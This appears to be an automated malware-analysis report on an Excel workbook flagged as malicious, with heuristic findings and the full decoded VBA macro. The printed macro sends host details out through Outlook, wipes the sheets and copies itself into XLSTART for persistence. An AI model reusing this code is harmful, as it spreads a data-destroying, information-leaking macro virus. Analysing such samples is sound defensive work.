Verdict: MALICIOUS
Risk Score: 118

Heuristics (6)

- VBA project inside OOXML (medium, 3 related findings) [OOXML_VBA]: Document contains a VBA project; VBA macros present.
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set ol = CreateObject("outlook.application")`
- VBA copies the workbook into the Excel XLSTART startup folder (high) [OLE_VBA_XLSTART_PERSISTENCE]: The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour. Matched line in script: `ActiveWorkbook.SaveAs FileName:=Application.StartupPath & "\ Book1.xls", _`
- Workbook_Open macro (low) [OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script: `Private Sub Workbook_Open()`
- External workbook data link (low) [OOXML_EXTERNAL_REL_DATALINK]: External workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: https://ugentbe-my.sharepoint.com/personal/marieclaire_vandevelde_ugent_be/Documents/Documents/B V/Collectief Maatsch Pr
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: https://ugentbe-my.sharepoint.com/personal/marieclaire_vandevelde_ugent_be/Documents/Documents/B (channel: OOXML external relationship)
Extracted artifacts (3)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3918 bytes | 71a2ea7bbfc7c47006aada9caabfb76b648459a69c78b894f26e66b40664c945 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 20480 bytes | 7c6397485aea97b3d29248e049a8b6d9668485dad671774c64de2279727d1203 |
| emf_00.emf | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 113424 bytes | 23cfa4d8f277088ba78708efe67cc21e31b07294a79f7321a5ef3bad6d09d7e6 |

Preview script for macros.bas (first 1,000 lines of the extracted script; the original Romanian comments are translated to English, code and string literals are left exactly as extracted):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    On Error Resume Next
    'Save the active document
    ActiveWorkbook.Save
    'Suppress alerts when deleting sheets (or on other actions)
    Application.DisplayAlerts = False
    'Speed up the program and keep the changes from showing on screen in real time
    Application.ScreenUpdating = False
    On Error Resume Next
    SetAttr "C:\Setup.old", vbNormal
    If Dir("C:\Setup.old") = "" Then
        Open "C:\Setup.old" For Output As #1
        For i = 1 To 2
            Print #1, "[OptionalComponents]"
        Next i
        Close #1
        SetAttr "C:\Setup.old", vbHidden
        'Send information
        Dim ol As Object, myItem As Object
        Set ol = CreateObject("outlook.application")
        Set myItem = ol.CreateItem(olTaskItem)
        With myItem
            .To = "Vangu"
            .Subject = "Metanol"
            .Body = "M-a trimis Metan astãzi " & Now & Chr(13) & _
                "Date despre gazdã: " & Chr(13) & _
                " - De la: " & Application.UserName & Chr(13) & _
                " - Din fisierul: " & Application.ActiveWorkbook.Name & Chr(13) & _
                " - Având prestabilit fontul: " & Application.StandardFont & Chr(13) & _
                " - Salvând în fisierul prestabilit: " & Application.DefaultFilePath & Chr(13) & _
                " - Având discul curent cu memorie: " & Application.MemoryTotal & " byts." & Chr(13) & _
                " - din care ocupatã: " & Application.MemoryUsed & " byts." & Chr(13) & _
                " - liberã: " & Application.MemoryFree & " byts." & Chr(13) & _
                " - Cu sistem de operare: " & Application.OperatingSystem & Chr(13) & _
                " - Din " & Application.OrganizationName & Chr(13) & _
                " - Documentul apelat înaintea celui prezent: " & Application.RecentFiles(2).Name
            .NoAging = True
            .Close (olSave)
            .Send
        End With
        Set ol = Nothing
    Else
    End If
    'If the number of sheets in the current workbook is greater than the number of sheets set in Options
    Do While Application.Sheets.Count > Application.SheetsInNewWorkbook
        i = Application.Sheets.Count
        Worksheets(i).Activate
        Worksheets(i).Delete
    Loop
    'Name the sheets, except for the first one
    n = Application.Sheets.Count
    For i = 1 To n
        Sheets(i).Name = "Sheet" & i
    Next i
    'Clear the contents of the remaining sheets
    For i = 1 To Application.Sheets.Count
        Sheets(i).Activate
        Application.ActiveSheet.UsedRange.Select
        Selection.Clear
        'Delete all the controls as well
        Set Chestii = Worksheets(i).Shapes
        For Each shp In Chestii
            shp.Delete
        Next
        Range("A1").Select
    Next i
    'Save
    ActiveWorkbook.SaveAs FileName:=Application.StartupPath & "\ Book1.xls", _
        FileFormat:=xlNormal
    'Close the application
    Application.Workbooks(" Book1.xls").Close
    'Hide Book1 (but then Excel can no longer see it either)
    'SetAttr Application.StartupPat & "\ Book1.xls", vbHidden
    'Turn the alert option back on
    Application.DisplayAlerts = True
    Sheets(1).Activate
    'Update the screen with the changes
    Application.ScreenUpdating = True
    Range("a1").Select
End Sub
Private Sub Workbook_Open()
    'Worksheets(1).Activate
    'MsgBox ("La Multi Ani " & Application.UserName & " din " & Application.OrganizationName & " !")
End Sub
Private Sub Workbook_SheetActivate(ByVal Sh As Object)
End Sub
```